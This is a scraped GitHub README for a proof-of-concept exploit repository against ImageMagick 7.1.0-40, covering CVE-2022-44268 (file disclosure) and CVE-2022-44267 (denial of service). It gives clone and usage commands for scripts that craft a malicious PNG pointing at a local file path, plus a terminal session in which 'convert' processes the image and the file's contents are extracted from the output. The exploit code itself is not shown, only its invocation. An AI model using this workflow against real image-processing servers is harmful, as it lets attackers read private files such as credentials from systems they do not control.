CVE-2022-44268

Credit to the researchers who discovered this:

Bryan Gonzalez and the Ocelot Team

Create a malicious PNG to take advantage of ImageMagick 7.1.0-40:

CVE-2022-44267: Denial of Service
CVE-2022-44268: Information Disclosure

Disclaimer: The author of this project is not responsible for any possible harm caused by the materials of this project.

Requirements

Python3
PIL (pip install Pillow)

Usage

Crafting a PNG with craft.py:

git clone https://github.com/agathanon/cve-2022-44268
cd cve-2022-44268
python3 craft.py original.png lol.png /path/to/file

Data extraction with extract.py:

python3 extract.py exfil.png

PoC

anon@computer:~/code/cve-2022-44268$ python3 craft.py original.png readflag.png $PWD/flag.txt 
anon@computer:~/code/cve-2022-44268$ convert readflag.png -resize 100x100 exfil.png
anon@computer:~/code/cve-2022-44268$ python3 extract.py exfil.png
AAAABBBBCCCC

anon@computer:~/code/cve-2022-44268$

Name		Name	Last commit message	Last commit date
Latest commit History 11 Commits
README.md		README.md
craft.py		craft.py
extract.py		extract.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

craft.py

craft.py

extract.py

extract.py

Repository files navigation

CVE-2022-44268

Requirements

Usage

PoC

About

Languages

Navigation Menu

agathanon/cve-2022-44268

Folders and files

Latest commit

History

README.md

README.md

craft.py

craft.py

extract.py

extract.py

Repository files navigation

CVE-2022-44268

Requirements

Usage

PoC

About

Resources

Stars

Watchers

Forks

Languages